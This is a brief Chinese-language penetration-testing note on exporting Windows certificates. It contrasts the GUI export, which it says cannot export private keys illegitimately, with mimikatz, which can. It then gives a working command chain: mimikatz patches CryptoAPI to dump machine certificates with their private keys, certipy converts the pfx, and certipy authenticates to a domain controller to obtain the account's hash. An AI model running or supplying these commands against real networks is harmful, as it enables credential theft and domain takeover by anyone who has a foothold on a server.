图形化导出证书
此方法不能非法导出密钥。右键——>所有任务(K)——>导出(E)
mimikatz 导出证书
此方法能非法导出密钥。
mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /systemstore:local_machine /store:my /export" "exit" # 先转换为 certipy 可用的 pfx 文件 certipy cert -pfx local_machine_my_1_dc01.HACK.com.pfx -password "mimikatz" -export -out DC01.HACK.com.pfx # 认证获得 hash certipy auth -pfx DC01.HACK.com.pfx -dc-ip 192.168.72.21 -debug